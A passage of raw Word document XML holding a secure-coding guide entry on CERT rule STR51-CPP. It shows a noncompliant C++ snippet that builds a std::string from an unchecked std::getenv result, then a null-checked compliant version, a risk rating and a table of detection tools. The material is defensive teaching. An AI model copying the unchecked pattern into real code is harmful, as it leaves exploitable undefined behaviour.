              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::string tmp(std::</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>getenv</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="003366"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"TMP"</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F1BB5F2"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(!tmp.empty()) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6520039E"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>    </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1837A43C"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12374FA0" w14:textId="430A6F6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000000"/>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7E3AE17" w:rsidR="00F72634" w:rsidRDefault="00533084" w:rsidP="0015146B">
            <w:r>
              <w:t>The results from the call to std::getenv() are checked for null before the std::string object is created.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="1A9D16B4" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="628ABE7B"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;cstdlib&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FBA69CB"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;string&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D798D47"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B2DB270"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13233DC5"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>char</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*tmpPtrVal = std::</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>getenv</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="003366"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"TMP"</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A056231"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::string tmp(tmpPtrVal ? tmpPtrVal : </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="003366"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B94D169"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(!tmp.empty()) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27327A4B"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>    </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="568A5E38" w14:textId="7777777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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5286DB6F" w14:textId="22370487" w:rsidR="00533084" w:rsidRPr="00533084" w:rsidRDefault="00533084" w:rsidP="00533084">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00533084">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>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8CBF737" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Principles(s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="634DE328" w14:textId="78EF0E80" w:rsidR="00027E4C" w:rsidRPr="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="007F6A57">
              <w:t>(1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidRPr="007F6A57">
              <w:t>Validate Input</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Data</w:t>
            </w:r>
            <w:r w:rsidRPr="007F6A57">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00027E4C">
              <w:t xml:space="preserve"> In the compliant code example, the results from the call to std::getenv() are checked for null, validating the function call before the string object is created. Otherwise, exploitable undefined behavior could have resulted.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20135ACC" w14:textId="77777777" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(9) </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Use Effective Quality Assurance Techniques- </w:t>
            </w:r>
            <w:r w:rsidR="00027E4C">
              <w:t>Incorporating good quality assurance techniques such as source code audits can help developers find issues such as the one presented in the noncompliant code.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="337D82A6" w14:textId="44F58628" w:rsidR="00027E4C" w:rsidRPr="007F6A57" w:rsidRDefault="00027E4C" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(2) Heed Compiler Warnings- If a warning should appear to let the developer know that </w:t>
            </w:r>
            <w:r w:rsidR="0079083E">
              <w:t>a null pointer has been returned</w:t>
            </w:r>
            <w:r>
              <w:t>, the developer should take note and modify the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A2EB921" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C1BDC13" w14:textId="1FE1DD58" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33D6ABC8" w14:textId="59B096A1" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D88F132" w14:textId="43FEF7C0" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1999E754" w14:textId="67D43B1C" w:rsidR="00B475A1" w:rsidRDefault="002C38B9"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9EBCCB4" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Astree</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6692C9F4" w14:textId="0C6EEE49" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>22.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="285A8AFB" w14:textId="4DC583F7" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>assert_failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="349283E5" w14:textId="053CEFA9" w:rsidR="002C38B9" w:rsidRDefault="002C38B9" w:rsidP="002C38B9"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="21077E8E" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27D17B6B" w14:textId="353CAAE1" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CodeSonar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A788F9D" w14:textId="73B257FE" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7.1p0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E2A4868" w14:textId="76DAEC38" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>LANG.MEM.NPD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6728BDD5" w14:textId="6E8F3C48" w:rsidR="00B475A1" w:rsidRDefault="002C38B9"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4113E547" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Parasoft C/C++test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CC79B01" w14:textId="2AC4BD0A" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10926EE6" w14:textId="074983B8" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CERT_CPP-STR51-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CB53902" w14:textId="3608E3CC" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Avoid null pointer dereferencing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="4771F374" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E6AC12A" w14:textId="14438564" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Polyspace Bug Finder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="608161A4" w14:textId="29D64D59" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>R2022b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E8BB44E" w14:textId="3B006571" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CERT C++: STR51-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30910B79" w14:textId="78B6D74C" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Checks for string operations on null pointer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6FF2884" w:rsidR="00381847" w:rsidRDefault="00DA57A8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>STR02-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
